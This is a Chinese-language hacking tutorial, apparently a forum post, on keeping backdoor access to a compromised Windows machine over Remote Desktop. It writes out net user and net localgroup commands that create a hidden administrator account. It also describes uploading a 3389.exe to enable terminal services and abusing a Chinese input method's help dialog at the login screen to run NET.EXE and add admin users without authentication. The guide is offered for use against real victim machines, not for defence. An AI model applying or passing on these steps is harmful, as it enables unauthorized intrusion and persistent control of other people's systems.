大家好,我是四海边缘,第一次写文章,写不的好,(可不要拿鸡蛋砸我哦!)
今天看了一个教程 (利用极品五笔输入法入侵3389)
前提是必须本机要装上(极品五笔输入法) 目标机器也要装上(极品五笔输入法)
目标机器开着终端服务,
怎么样留后门呢?
首先我要们入侵一台主机,IP:211.54.**.*** 成功入侵后, 建立一个帐号
net user shpl$ 123456 /add
提升为管理员
net localgroup administrators shpl$ /add
提升为管理员后,我想大家都已经知道后面要做什么,呵呵, 当然是给肉鸡开3389咯,
把我们的3389.exe 上传的目标主机上, 然后运行3389.exe 目标主机就会自动重起,……………………
好了,我们来登陆我们的肉鸡, 登陆成功后, 我们到某个网站上下载 (极品五笔输入法)
然后在肉鸡上安装上,安装目录隐蔽点哦!!! 然后把卸出放到别处,
这样我们的就这样为肉鸡留一下了个后门,
只要管理员不知道(极品五笔输入法)的输入法漏洞 那这个后门就留下拉,
如果我们刚刚建立的帐号 shpl$ 被管理员删除了怎么办? 只要肉鸡还开启着3389 那我们就要利用我们的后门,来建立一个帐号
首先登陆211.54.**.***
然后在帐号的输入框里切换输入法 切换到极品五笔输入法
在极品五笔输入法点右键,我们点选 帮助--输入法操作指南
在弹出的帮助对话框中的选项中点击右键弹出如下对话,我们选 跳至URL。
跳至URL那里填如 c:\winnt\system2\ 回车
找到NET.EXE 选中新建NET快捷方式,
找到快捷方式的NET.EXE后,右键属性
在弹出的属性对话框中,打入 user 用户名 密码 /add ,新建一个你想建立的用户名。然后双击该快捷方式运行,此时不会看到有任何反映,因为该命令已在后台运行。
下面我们再选中新建NET快捷方式,点击右键,选属性,在弹出的属性对话框中,打入 localgroup administrators 你建立的用户名 /add,把你建立的新用户提升为系统管理员。然后双击该快捷方式运行,此时仍然不会看到有任何反映,但该命令已在后台运行。
至此,你已在这台机器上建立了拥有Admin权限的用户,在登录框中输入你建立的用户和密码就可以进入机器进行管理了,
哈! 我们的肉鸡又回来了 怎么样!